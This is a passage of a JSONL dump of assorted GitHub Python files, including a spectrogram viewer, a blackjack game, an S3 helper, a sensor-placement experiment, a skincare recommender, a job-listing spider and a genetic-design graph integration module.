self._main_settings_frame.set_guano_data(myaf.get_guano_data())\n self._main_settings.on_open_new_file()\n self.event_generate(DATA_CHANGE_MAIN_EVENT)\n\n def _do_open_ref_file(self, filepath):\n myaf = self._do_open_file(filepath, self._menu_recent_ref, self._do_open_ref_file, self._ref_historian)\n if myaf is not None:\n self._dc_ref.update_from_af(myaf)\n self._ref_settings_frame.copy_settings_to_widgets() # The axis ranges have changed\n self._ref_settings_frame.set_guano_data(myaf.get_guano_data())\n self._main_settings.on_open_new_file()\n # Make sure the ref pane is visible:\n x, y = self._paned_window.sash_coord(0)\n if x < 10:\n self._paned_window.sash_place(0, 300, y)\n self.event_generate(DATA_CHANGE_REF_EVENT)\n\n def _do_open_file(self, filepath, recent_menu_item, method, historian):\n self._push_cursor(\"watch\") # A large file might take time to load. Though, it seems not.\n try:\n # Attempt to read the wav file provided:\n af_this = af.AudioFileService(filepath)\n af_this.open()\n except (FileNotFoundError, WavFileError) as e:\n tk.messagebox.showerror(PROGRAM_NAME, \"Error reading audio file: {}\".format(e))\n return None\n else:\n self._main_historian.add_file(filepath)\n self._populate_file_history(recent_menu_item, historian, method)\n return af_this\n finally:\n self._pop_cursor()\n\n def _close_main_file_event(self):\n self._dc_main.reset()\n self._main_settings_frame.set_guano_data(None)\n self.event_generate(DATA_CHANGE_MAIN_EVENT)\n\n def close_ref_file_event(self):\n self._dc_ref.reset()\n self._main_settings_frame.set_guano_data(None)\n self.event_generate(DATA_CHANGE_REF_EVENT)\n\n def exit_event(self, _):\n self.exit()\n\n def exit(self):\n if (tk.messagebox.askokcancel(\n message='Are you sure you want to exit {}?'.format(PROGRAM_NAME),\n icon='question', title='Exit')):\n for p in chain(self._main_pipelines, self._ref_pipelines):\n if p:\n p.shutdown()\n\n appsettings.instance.write()\n\n self.destroy()\n\n def _on_data_change_main(self, _):\n self._dc_main.on_data_change()\n self._main_pane.draw()\n # Tell the other pane we can accept sync requests (as we have some data):\n sync_source = self._main_pane if self._dc_main.afs else None\n self._ref_pane.set_sync_source(sync_source)\n\n def _on_data_change_ref(self, _):\n self._dc_ref.on_data_change()\n self._ref_pane.draw()\n # Tell the other pane we can accept sync requests (as we have some data):\n sync_source = self._ref_pane if self._dc_ref.afs else None\n self._main_pane.set_sync_source(sync_source)\n\n @staticmethod\n def _pipeline_error_handler(e):\n tk.messagebox.showerror(PROGRAM_NAME, \"Error encountered in processing pipeline: {}\".format(e))\n raise e\n\n def _on_app_modified_main_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # This gets called from the graph pane when the user changes settings\n # such as graph scaling.\n self._main_settings_frame.copy_settings_to_widgets()\n\n def on_user_applied_main_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # New settings values are available to be applied to the application.\n self._main_pane.on_user_applied_settings(draw_scope)\n\n def _on_app_modified_ref_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # This gets called from the graph pane when the user changes settings\n # such as graph scaling.\n self._ref_settings_frame.copy_settings_to_widgets()\n\n def on_user_applied_ref_settings(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # New settings values are available to be applied to the application.\n self._ref_pane.on_user_applied_settings(draw_scope)\n\n def _show_about(self):\n window = AboutWindow(self)\n window.grab_set()\n window.wait_window()\n\n def _show_settings(self):\n previous_data_directory = appsettings.instance.data_directory\n modal = AppSettingsWindow(self, appsettings.instance, lambda: self._on_settings_ok(previous_data_directory))\n modal.grab_set()\n modal.wait_window()\n\n def _on_settings_ok(self, previous_data_directory: str):\n # Refresh some things from the updated settings values:\n if previous_data_directory != appsettings.instance.data_directory:\n # Force the new data directory to be used when next opening the a file:\n self._first_file_open = True\n self._apply_settings()\n self._main_pane.draw()\n self._ref_pane.draw()\n\n @staticmethod\n def _apply_settings():\n # Refresh some things from the updated settings values:\n cmap_file = COLOUR_MAPS[appsettings.instance.colour_map]\n colourmap.instance.reload_map(cmap_file)\n","repo_name":"jmears63/batogram","sub_path":"batogram/rootwindow.py","file_name":"rootwindow.py","file_ext":"py","file_size_in_byte":34450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2948080419","text":"import random\r\nimport sys\r\n#from tkinter import *\r\n\r\n\r\nprint(\"Welcome to Python Blackjack!\")\r\n\r\ncards = ['2', '2', '2', '2',\r\n '3', '3', '3', '3',\r\n '4', '4', '4', '4',\r\n '5', '5', '5', '5',\r\n '6', '6', '6', '6',\r\n '7', '7', '7', '7',\r\n '8', '8', '8', '8',\r\n '9', '9', '9', '9',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n '10', '10', '10', '10',\r\n 'Ace', 'Ace', 'Ace', 'Ace']\r\n\r\n\r\ndef dealer_hand() -> list:\r\n print()\r\n print(\"Dealer's hand:\")\r\n print('-------------')\r\n return deal_cards()\r\n\r\n \r\n \r\n\r\ndef player_hand() -> list:\r\n print()\r\n print(\"Player's hand:\")\r\n print('-------------')\r\n return deal_cards()\r\n \r\n \r\n\r\n \r\ndef deal_cards() -> list:\r\n temp = []\r\n hand = []\r\n print()\r\n print(\"*Dealt hand*\")\r\n for i in range(2):\r\n cards_dealt = random.choice(cards)\r\n print( cards_dealt)\r\n temp.append(cards_dealt)\r\n cards.remove(cards_dealt)\r\n print()\r\n print(\"*Current hand*\")\r\n for card in temp:\r\n if card == 'Ace':\r\n value = int(input(\"Ace = 1 or 11? \"))\r\n if value == 1:\r\n hand.append(1)\r\n if value == 11:\r\n hand.append(11) \r\n else:\r\n hand.append(int(card))\r\n \r\n for card in hand:\r\n print( card)\r\n \r\n return hand\r\n\r\n\r\n\r\n\r\ndef total(L) -> int:\r\n total = 0\r\n for card in L:\r\n total += card\r\n\r\n print()\r\n print(\"Total hand value:\")\r\n print( total)\r\n\r\n if total == 21:\r\n print(\"Blackjack!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n return total\r\n\r\n\r\n\r\n\r\ndef hit_player():\r\n global final\r\n final = 0\r\n print(\"Player's Turn\")\r\n print('-------------')\r\n current_hand = player_hand() #list\r\n hand_total = total(current_hand) #int\r\n print()\r\n while True: \r\n ask = input(\"Hit or stand? \")\r\n if ask == \"hit\":\r\n new_card = random.choice(cards)\r\n if new_card == \"Ace\":\r\n value = int(input(\"Ace = 1 or 11? \"))\r\n if value == 1:\r\n current_hand.append(1)\r\n hand_total += 1\r\n if value == 11:\r\n current_hand.append(11)\r\n hand_total += 11\r\n else:\r\n current_hand.append(new_card)\r\n hand_total += int(new_card)\r\n \r\n for card in current_hand:\r\n print( card)\r\n print(\"Total hand value:\")\r\n print( hand_total)\r\n\r\n\r\n if hand_total == 21: \r\n print(\"Blackjack! Player wins!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n \r\n if hand_total > 21:\r\n print()\r\n print(\"Busted!\")\r\n print(\"Dealer wins!\")\r\n sys.exit()\r\n else:\r\n continue\r\n\r\n \r\n elif ask == \"stand\":\r\n final += hand_total\r\n hit_dealer()\r\n \r\n\r\ndef hit_dealer():\r\n print(\"Dealer's Turn\")\r\n print('-------------')\r\n current_hand2 = dealer_hand() #list\r\n hand_total2 = total(current_hand2) #int\r\n print()\r\n while True:\r\n ask2 = input(\"Hit or stand? \")\r\n if ask2 == \"hit\":\r\n if hand_total2 < 17:\r\n new_card2 = random.choice(cards)\r\n if new_card2 == \"Ace\":\r\n value2 = int(input(\"Ace = 1 or 11? \"))\r\n if value2 == 1:\r\n current_hand2.append(1)\r\n hand_total2 += 1\r\n if value2 == 11:\r\n current_hand2.append(11)\r\n hand_total2 += 11\r\n else:\r\n current_hand2.append(new_card2)\r\n hand_total2 += int(new_card2)\r\n else:\r\n print(\"Dealer has reached 17 points\")\r\n hit_player()\r\n\r\n for card in current_hand2:\r\n print(card)\r\n print(\"Total hand value:\")\r\n print( hand_total2)\r\n\r\n\r\n if hand_total2 == 21: \r\n print(\"Blackjack! Dealer wins!\")\r\n sys.exit()\r\n else:\r\n pass\r\n \r\n\r\n if hand_total2 > 21:\r\n print()\r\n print(\"Busted!\")\r\n print(\"Dealer loses! Player wins!\")\r\n sys.exit()\r\n else:\r\n continue\r\n \r\n \r\n elif ask2 == \"stand\":\r\n if final == hand_total2:\r\n print(\"Push\")\r\n sys.exit()\r\n if final < hand_total2:\r\n print(\"Dealer wins!\")\r\n sys.exit()\r\n if final > hand_total2:\r\n print(\"Player wins!\")\r\n sys.exit()\r\n\r\n\r\n\r\n##\r\n##window = Tk()\r\n##window.title(\"Blackjack\")\r\n##window.configure(background = 'sea green')\r\n##\r\n##input = Entry(window, width = 5, font = (\"Comic Sans MS\", 20))\r\n##input.pack()\r\n##\r\n##label_for_hit = Label(window, fg = 'white', bg = 'sea green', text = 'Welcome to Python Blackjack!', font = (\"Comic Sans MS\", 15))\r\n##label_for_hit.pack()\r\n##\r\n##player = Label(window, bg = 'white', fg = 'black')\r\n##player.pack()\r\n##\r\n##\r\n##start = Button(window, fg = 'white', bg = 'sea green', text = 'Start', font = (\"Comic Sans MS\", 15), command = hit_player)\r\n##start.pack(side = BOTTOM)\r\n##\r\n##\r\n##window.mainloop()\r\n\r\n \r\nif __name__ == '__main__':\r\n hit_player()\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mjain10/BlackJack","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28797301860","text":"#!/usr/bin/env python\n\nimport gtk\nimport os\n\n# adding the pin icon to the a factory\ndef insert_factory():\n factory = gtk.IconFactory()\n os.chdir(\"icons\")\n pin_pixbuf = gtk.gdk.pixbuf_new_from_file(\"pin.png\")\n pin_iconset = gtk.IconSet(pin_pixbuf)\n factory.add('pin-icon', pin_iconset)\n factory.add_default()\n os.chdir(\"..\")\n\n#setting the pin image\ndef set_pin_image():\n pin_image = gtk.Image()\n pin_image.set_from_stock('pin-icon', gtk.ICON_SIZE_MENU) \n return pin_image\n \n \ninsert_factory()\n","repo_name":"satish28/Stickies_Pygtk","sub_path":"stickies/icons.py","file_name":"icons.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15050220947","text":"import boto3\nfrom .abstractions import CreateConnection, Listings, Uploader, Downloader\n\nclass Aws(CreateConnection, Listings, Uploader, Downloader):\n \n def create_client(self, bucket_name, object_name, region, aws_access_key_id, aws_secret_access_key):\n self.bucket_name = bucket_name\n self.object_name = object_name\n\n try:\n self.client = boto3.client('s3',\n region_name=region,\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key\n )\n except Exception as e:\n raise Exception(f\"ERROR creating client, \" + str(e))\n \n\n return self.client\n\n def list_objects(self):\n list_of_objects = []\n response = self.client.list_objects_v2(\n Bucket=self.bucket_name,\n MaxKeys=10000\n )\n for k,v in response.items():\n if k == \"Contents\":\n #print(k,v)\n for value in v:\n list_of_objects.append(value['Key'])\n\n return list_of_objects\n\n def download_objects(self):\n for object_name in self.object_name:\n try:\n self.client.download_file(self.bucket_name, object_name, object_name)\n except Exception as e:\n raise Exception(f\"ERROR downloading object(s) from bucket {self.bucket_name}, \" + str(e))\n \n def upload_objects(self):\n for object_name in self.object_name:\n try:\n self.client.upload_file(object_name, self.bucket_name, object_name)\n except Exception as e:\n raise Exception(f\"ERROR uploading object to bucket {self.bucket_name}, \" + str(e))","repo_name":"tzankov/safehaven","sub_path":"safehaven/aws_s3.py","file_name":"aws_s3.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38712329813","text":"import os\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport time\nfrom sacred import Experiment\nfrom tempfile import NamedTemporaryFile\nimport pandas as pd\n\nimport func_timeout as to\n\nimport sdsft\n\nfrom exp.ingredients import model\nfrom exp.ingredients import sensor_dataset as dataset\n\nexperiment = Experiment(\n 'training',\n ingredients=[model.ingredient, dataset.ingredient]\n)\n\n\n@experiment.config\ndef cfg():\n n_samples = 10000 #number of samples for computing the error estimates\n timeout = 144*3600 # 144 h timeout\n card_max = 40 #maximal cardinality for the greedy optimization\n\n\n@experiment.automain\ndef run(n_samples, card_max, timeout, _run, _log):\n\n result = {}\n # Get data\n s, n = dataset.get_instance()\n # Get model\n ft = model.get_instance(n)\n try: \n start = time.time()\n estimate = to.func_timeout(timeout, ft.transform, args=[s])\n end = time.time()\n gt_vec, est_vec = sdsft.eval_sf(s, estimate, n, n_samples = n_samples, err_type='raw')\n rel = np.linalg.norm(gt_vec - est_vec)/np.linalg.norm(gt_vec)\n mae = np.mean(np.abs(gt_vec - est_vec))\n inf = np.linalg.norm(gt_vec - est_vec, ord=np.inf) \n\n n_queries = s.call_counter\n t = end-start\n result['rel'] = result.get('rel', []) + [rel]\n result['mae'] = result.get('mae', []) + [mae]\n result['n_queries'] = result.get('n_queries', []) + [n_queries]\n result['time'] = result.get('time', []) + [t]\n result['freqs'] = result.get('freqs', []) + [estimate.freqs.tolist()]\n result['coefs'] = result.get('coefs', []) + [estimate.coefs.tolist()]\n print('mae %f, rel %f, n_q %d, t %f'%(mae, rel, n_queries, t), end='\\r')\n _run.log_scalar('k', len(estimate.coefs))\n \n if card_max > 0:\n values_gt = []\n values_ft = []\n values_random = []\n for card in range(0, card_max+1):\n sensors, value = sdsft.maximize_greedy(s, n, card)\n sensors_ft, _ = sdsft.maximize_greedy(estimate, n, card)\n value_ft = s(sensors_ft)[0]\n values_gt += [value]\n values_ft += [value_ft]\n perm = np.random.permutation(n)\n ind = np.zeros(n, dtype=np.bool)\n ind[perm[:card]] = True\n values_random += [s(ind)[0]]\n\n with NamedTemporaryFile(suffix='.pdf', delete=False) as f:\n plt.plot(values_gt, label='gt')\n plt.plot(values_ft, label='Fourier')\n plt.plot(values_random, label='random')\n plt.legend()\n plt.xlabel('cardinality constraint')\n plt.ylabel('information gain')\n plt.xlim(0, card_max)\n plt.ylim(bottom=0)\n plt.savefig(f.name, format='pdf')\n plt.close()\n _run.add_artifact(f.name, 'constrained_maximization.pdf')\n\n with NamedTemporaryFile(suffix='.csv', delete=False) as f:\n df = pd.DataFrame({\"cards\":np.arange(card_max+1), \"gt\": values_gt, \n \"fourier\": values_ft, \"random\":values_random})\n df.to_csv(f.name, index=False, sep=',', decimal='.')\n _run.add_artifact(f.name, 'log_det.csv')\n\n except to.FunctionTimedOut:\n gt_vec, est_vec = 'timeout', 'timeout'\n t = 'timeout'\n rel = 'timeout'\n mae = 'timeout'\n n_queries = 'timeout'\n inf = 'timeout'\n\n result['rel'] = result.get('rel', []) + [rel]\n result['mae'] = result.get('mae', []) + [mae]\n result['n_queries'] = result.get('n_queries', []) + [n_queries]\n result['time'] = result.get('time', []) + [t]\n result['freqs'] = result.get('freqs', []) + ['timeout']\n result['coefs'] = result.get('coefs', []) + ['timeout']\n print('%d seconds timeout reached'%timeout, end='\\r')\n \n \n \n _run.log_scalar('rel', rel)\n _run.log_scalar('mae', mae)\n _run.log_scalar('n_queries', n_queries)\n _run.log_scalar('time', t)\n _run.log_scalar('inf', inf)\n \n return result\n","repo_name":"wendlerc/aaai-ssft","sub_path":"exp/run_sensorplacement.py","file_name":"run_sensorplacement.py","file_ext":"py","file_size_in_byte":4201,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"42734598043","text":"def solution(m, n, puddles):\n answer = 0\n\n #지도 그리기 0으로\n p_map = [[0 for i in range(0, m+1)] for j in range(n+1)]\n p_map[1][1] = 1\n\n #윗줄부터 합 구해가기\n for i in range(1, n+1):\n for j in range(1, m+1):\n if [j,i] not in puddles:\n p_map[i][j] += (p_map[i-1][j] + p_map[i][j-1])\n\n return p_map[n][m] % 1000000007\n\nprint(solution(4, 3, [[2,2]]))\n","repo_name":"iso11/programmers","sub_path":"Dynamic_Programming/lessons42898.py","file_name":"lessons42898.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31057945758","text":"import pandas as pd\r\nimport psycopg2\r\nimport os\r\n\r\npassword = os.environ['DB_PASS']\r\nuser = os.environ['DB_USER_NAME']\r\nhost = os.environ['DB_HOST']\r\nname = os.environ['DB_NAME']\r\nport = 5432\r\n\r\nclass DataModel(object):\r\n def __init__(self):\r\n self.conn = psycopg2.connect(dbname=name, host=host,\r\n password=password,user=user)\r\n self.cur = self.conn.cursor()\r\n self.categories = ['cleanser','serum','moisturizer']\r\n self.concerns = []\r\n self.product_list = []\r\n #self.df_columns = ['price','asin','imageurl','category','title','linkurl','confidence'] #columns from table. Will add the concerns when making select statement\r\n self.instruction_dictionary = {'moisturizer':'Moisturizers are the last product to be applied at night and applied before sunscreen during the day. \\\r\n They have different consistencies depending on which base ingredients were used (called emollients).\\\r\n Moisturizers are meant to sit on the surface of the skin as an added barrier against antioxidants, sun, and pollutants.',\r\n 'serum':'Serums are applied one to two times per day after cleansing and toning. \\\r\n Serums give you the most bang for your buck with active ingredients in smaller molecules meant to penetrate the skin.\\\r\n Use a drop or two for the entire face and neck, rubbing in circles as it absorbs into the skin. \\\r\n Using serums increases the strength of your beauty regimen and provide a more comprehensive \\\r\n approach by including more than one serum in your routine.',\r\n 'cleanser':'Cleansing is the first step in your beauty regimen. \\\r\n Wash your face and neck in the morning and evening. \\\r\n Cleansers are for washing dirt and makeup away.\\\r\n It is important to pick good ingredients that are free of harsh chemicals and parabens.\\\r\n Ingredients in cleansers do not penetrate the skin.',\r\n 'peel/mask':'Masks and peels are applied to the skin once or twice a week. \\\r\n They contain a high concentration of active ingredients dissolved in solvents and meant to penetrate the skin. \\\r\n Masks and peels provide an added boost to your daily routine by leaving the ingredients on your skin for a longer period of time. \\\r\n Like serums, you can use more than one during the week to round out your routine. \\\r\n Apply after cleansing and toning and before serum and moisturizer,\\\r\n leave on for 5-15 minutes before washing or peeling off (depending on the product). ',\r\n 'toner':'Toners complete the cleansing of your skin by removing any impurities or oils that are still lingering after cleansing. \\\r\n There are several types of toners that address different skin types: hydrating for dry skin, stringent for oily skin, and \\\r\n calming for sensitive. They help balance the skin and increase absorption of ingredients in subsequent products. \\\r\n After cleansing in the morning and evening, saturate two cotton pads and use on your face, neck, and decolletage.',\r\n 'exfoliant':'Exfoliants brighten the skin, encourage new growth and prevent clogged pores by removing the top layer of dead cells. \\\r\n Use natural ingredients that remove the skin gently, staying away from plastic microbeads (such as polyethylene), \\\r\n harsh chemicals (such as DBP, BHA/BHT, and Triclosan), and silicones. Exfoliants can be used daily if gentle enough but \\\r\n should be used at least once or twice a week. Apply after cleansing and toners and before masks/peels, serums, and treatments. \\\r\n Use according the instructions, some exfoliants are left on while others are gently rubbed on skin and washed away with water.',\r\n 'treatment':'Treatments are the heavy duty line of defense for addressing concerns. If you use serums and masks regularly but are looking for \\\r\n something extra on a special occasion or for the occasional, transient concern, you can try a treatment. They have a higher \\\r\n concentration of ingredients that can produce an immediate, temporary effect or to boost the effectiveness of your beauty regimen.\\\r\n Use according to instructions once or twice a week.'}\r\n\r\n self.script_dictionary = {'moisturizer':'Important for all day defense against free radicals and environmental damage.', \r\n 'cleanser': 'A good cleanser is essential for removing dirt and pollutants from your skin.',\r\n 'toner': 'Prep your skin with a hydrating toner to help subsequent products infuse better.',\r\n 'exfoliant': 'Remove dead skin cells and dirt once or twice a week to give you an added glow.',\r\n 'mask': 'The second line of defense for your skin concerns. Use with serum to see the biggest effect.',\r\n 'peel': 'Refines your skin by removing the top epidermal layer.',\r\n 'treatment': 'Use for an intense, targeted approach for specific concerns to round out your routine.',\r\n 'serum': 'The most corrective for your biggest concerns. Include more than one into your routine to address all concerns.'\r\n }\r\n\r\n def import_data(self):\r\n query = '''\r\n SELECT m.*, p.price, p.title, p.imageurl, p.numberreviews, p.confidence\r\n FROM combined_aoc as m\r\n JOIN productinfo as p\r\n ON m.asin=p.asin\r\n '''\r\n\r\n self.df = pd.read_sql_query(query,self.conn)\r\n\r\n\r\n def _create_instruction_dictionary(self):\r\n get_instructions = '''SELECT *\r\n FROM instructions'''\r\n self.cur.execute(get_instructions)\r\n rows = self.cur.fetchall()\r\n #print('rows of instructions = ',rows)\r\n for row in rows:\r\n self.instruction_dictionary[row[0]] = row[1].encode('utf-8')\r\n \r\n def get_recommendations(self,concerns):\r\n '''input: list of concerns\r\n return: product_list = list of product dictionaries\r\n [\r\n {concern1:product_total(double precision),\r\n concern2:product_total(double precision),\r\n etc,\r\n asin: text,\r\n title:text,\r\n imageurl:text,\r\n price:double precision,\r\n category:text,\r\n confidence: double precision}\r\n ]\r\n \r\n '''\r\n self.concerns = concerns\r\n self.import_data()\r\n self.product_list.extend(self.df.to_dict(orient='records'))\r\n\r\n return(self.product_list)\r\n","repo_name":"keri/personalized_skin_care","sub_path":"website/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43552584185","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom job.items import JobItem\n\nclass A51jobSpider(scrapy.Spider):\n name = '51job'\n allowed_domains = ['zhipin.com']\n start_urls = ['https://www.zhipin.com/c101010100/?query=python&page=1']\n\n def parse(self, response):\n body = response.css(\".job-primary\")\n for head in body:\n item = JobItem()\n item[\"title\"] = head.css(\".job-title::text\").extract()[0]\n item[\"wage\"] = head.css(\".red::text\").extract()[0]\n item[\"site\"] = head.css(\".info-primary p::text\").extract()[0]\n item[\"name\"] = head.css(\".company-text .name a::text\").extract()[0]\n item[\"expert\"] = head.css(\".info-primary p::text\").extract()[1]\n item[\"edu\"] = head.css(\".info-primary p::text\").extract()[2]\n yield item\n\n # 翻页\n next_page = response.css(\".page .next::attr(href)\").extract()[0]\n if next_page is not None:\n yield response.follow(\"https://www.zhipin.com\" + next_page,callback=self.parse)\n\n\n\n\n\n\n","repo_name":"MiniOK/job","sub_path":"job/job/spiders/a51job.py","file_name":"a51job.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11372627891","text":"from abc import ABC, abstractmethod\nimport re\nfrom rdflib import URIRef, RDF, DCTERMS\nfrom app.converter.utility.identifiers import identifiers as ids\nfrom app.converter.utility.common import map_to_nv, get_interaction_properties\nfrom app.graph.utility.model.model import model\nfrom app.graph.utility.graph_objects.edge import Edge\n\nnv_role = model.identifiers.predicates.role\nnv_characteristic = model.identifiers.predicates.hasCharacteristic\nphysical_entity = model.identifiers.roles.physical_entity\nr_interaction = model.identifiers.roles.interaction\np_synonym = model.identifiers.external.synonym\np_similar = model.identifiers.external.similar_to\no_interaction = model.identifiers.objects.interaction\n\nunusable_bl = [\"coming soon\",\"coming soon...\",\"tba\"]\ntrash_bl = [\"test\"]\n\nclass AbstractDatabase(ABC):\n def __init__(self,graph,miner,aligner):\n self._graph = graph\n self._miner = miner\n self._aligner = aligner\n\n @abstractmethod\n def build(self):\n pass\n\n @abstractmethod\n def integrate(self,graph,threshold,existing_seqs=None,existing_ints=None,existing_non_dna=None):\n model_roots = model.get_base_class()\n o_type_map = {}\n if existing_seqs is None:\n existing_seqs = {}\n if existing_ints is None:\n existing_ints = {}\n if existing_non_dna is None:\n existing_non_dna = {}\n dups = []\n sims = []\n dup_i = []\n for cd in graph.get_component_definitions():\n cd_types = graph.get_types(cd)\n if ids.roles.DNARegion in cd_types or ids.roles.DNA in cd_types:\n cd_seq = graph.get_sequences(cd)\n assert(len(cd_seq) == 1)\n cd_seq = cd_seq[0].lower()\n if cd_seq in existing_seqs:\n graph.replace_component_definition(cd,existing_seqs[cd_seq])\n self._graph.synonyms.positive(existing_seqs[cd_seq],cd)\n dups.append((existing_seqs[cd_seq],cd))\n continue\n o_type_map = self._add_cd(cd,graph,cd_types,model_roots,o_type_map)\n highest_score = [0,None]\n for k,v in existing_seqs.items():\n score = self._aligner.sequence_match(k,cd_seq)\n if score > highest_score[0]:\n highest_score = [score,v]\n if highest_score[0] > threshold:\n sims.append((highest_score[1],cd))\n self._graph.derivatives.positive(highest_score[1],cd,highest_score[0])\n existing_seqs[cd_seq] = cd\n else:\n cd_name = self._get_name(cd)\n for e,e_types in existing_non_dna.items():\n if len(list(set(e_types) & set(cd_types))) == 0:\n continue\n name = self._get_name(e)\n if cd_name in name or name in cd_name:\n self._graph.synonyms.positive(e,cd)\n dups.append((e,cd))\n break\n else:\n o_type_map = self._add_cd(cd,graph,cd_types,model_roots,o_type_map)\n existing_non_dna[cd] = cd_types\n \n for i in graph.get_interactions():\n i_type = graph.get_types(i)\n e_parts = []\n for p in graph.get_participants(interaction=i):\n p_role = graph.get_roles(p)\n assert(len(p_role) == 1)\n fc = graph.get_participant(p)\n fc_def = graph.get_definition(fc)\n e_parts.append(f'{p_role[0]}{fc_def}')\n \n assert(len(i_type) == 1)\n i_type = i_type[0]\n if i_type in existing_ints:\n for i_parts in existing_ints[i_type]:\n if e_parts == i_parts:\n dup_i.append(i)\n break\n else:\n self._add_interaction(i,graph,model_roots,o_type_map)\n existing_ints[i_type] += [e_parts]\n else:\n self._add_interaction(i,graph,model_roots,o_type_map)\n existing_ints[i_type] = [e_parts]\n \n print(len(dups),len(sims))\n print(\"Duplicates:\")\n for d in dups:\n print(d)\n print(\"Similars:\")\n for e in sims:\n print(e)\n print(\"Redundant Interactions:\")\n for i in dup_i:\n print(i)\n return existing_seqs,existing_ints,existing_non_dna\n\n \n def _add_cd(self,cd,s_graph,cd_types,m_roots,type_map):\n properties = ([(nv_characteristic, physical_entity)] +\n [(nv_role, r) for r in (s_graph.get_roles(cd) + cd_types)])\n s, p, o = map_to_nv(cd, properties, m_roots, model)\n sequence = s_graph.get_sequence_names(cd)\n if len(sequence) > 0:\n assert(len(sequence) == 1)\n props = {model.identifiers.predicates.hasSequence: sequence[0]}\n else:\n props = None\n n = self._add_node(s_graph,s, o, props)\n type_map[s] = o\n for s,p,o in s_graph.search((cd,[p_synonym,p_similar],None)):\n o = self._add_node(s_graph,o)\n self._graph.synonyms.positive(n,o)\n return type_map\n\n\n def _add_interaction(self,i,s_graph,m_roots,type_map):\n roles = ([(nv_characteristic, r_interaction)] +\n [(nv_role, r) for r in (s_graph.get_types(i))])\n s, p, o = map_to_nv(i, roles, m_roots, model)\n if o == o_interaction:\n return\n n = self._add_node(s_graph,s, o)\n for s, p, o in get_interaction_properties(i, o, type_map, model, s_graph,add_nv_props=False):\n if p == RDF.type:\n s = self._add_node(s_graph,s, o)\n else:\n s = self._add_node(s_graph,s)\n o = self._add_node(s_graph,o)\n self._add_edge(s_graph,s, o, p)\n\n\n def _add_node(self,graph,name, type=None, props=None):\n properties = self._get_properties(name, graph)\n if props is not None:\n properties.update(props)\n neo = self._graph.add_node(name,type,**properties)\n return neo\n\n\n def _add_edge(self,graph,n, v, e):\n properties = self._get_properties(e, graph)\n self._graph.add_edges(Edge(n,v,str(e),**properties),5)\n\n\n def _get_properties(self,entity, graph):\n properties = {}\n meta = graph.get_metadata(entity)\n properties[\"name\"] = self._get_name(entity)\n if len(meta) > 0:\n properties[DCTERMS.description] = meta\n return properties\n\n\n def _replace_cd(sel,graph,replacer,replaced):\n graph.remove_triple((replaced,ids.predicates.title,None)) \n for sa in graph.get_sequence_annotations(replaced):\n graph.remove_sequence_annotation(sa)\n for seq in graph.get_sequence_names(replaced):\n graph.remove_sequence(seq)\n graph.replace_component_definition(replaced,replacer)\n graph.add_synonym(replacer,replaced)\n return graph\n\n\n def _is_trash(self,metadata,sequence):\n if len(sequence) != 1:\n return True\n if len(sequence[0]) < 2:\n return True\n if any(ext in trash_bl for ext in metadata):\n return True\n if any(ext in unusable_bl for ext in metadata):\n return True\n return False\n \n\n def _prune_sbol_predicates(self,graph):\n preds = [\n \"toplevel\",\n \"ownedby\",\n \"created\",\n \"was_generated_by\",\n \"ended_at_time\",\n \"had_plan\",\n \"entity\",\n \"qualified_association\",\n \"qualified_usage\",\n \"agent\",\n \"model\",\n \"bookmark\",\n \"star\",\n \"modified\",\n \"owning_group_id\",\n \"dominant\",\n \"creator\",\n \"wasDerivedFrom\",\n \"bookmark\",\n \"m_user_id\",\n \"group_u_list\",\n \"owner_id\",\n \"status\",\n \"sampleStatus\",\n \"experience\",\n \"direction\",\n \"igdirection\",\n \"partStatus\",\n \"discontinued\"]\n prune_preds = [(None,getattr(ids.predicates,p),None) for p in preds]\n for triple in prune_preds:\n graph.remove_triple(triple)\n return graph\n \n\n def _prune_sbol_objects(self,graph):\n pruned_objs = [ids.objects.collection,\n ids.objects.attachment,\n ids.objects.model,\n ids.objects.activity,\n ids.objects.usage,\n ids.objects.association,\n ids.objects.agent,\n ids.objects.plan]\n for s,p,o in graph.search((None,RDF.type,pruned_objs)):\n graph.remove_triple((s,None,None))\n return graph\n \n\n def _handle_component_definition(self,graph,cd,seqs):\n md = graph.get_metadata(cd)\n sequence = graph.get_sequences(cd)\n if self._is_trash(md,sequence):\n return None,seqs\n if self._has_components(cd,graph):\n return None,seqs\n graph = self._prune_sbol_predicates(graph)\n graph = self._prune_sbol_objects(graph)\n seq = graph.get_sequences(cd)\n assert(len(seq) == 1)\n seq = seq[0]\n if seq in seqs:\n graph = self._replace_cd(graph,URIRef(seqs[seq]),cd)\n else:\n seqs[seq] = cd\n return graph,seqs\n\n\n def _has_components(self,subject,graph):\n component_roles = [\n ids.roles.promoter,\n ids.roles.rbs,\n 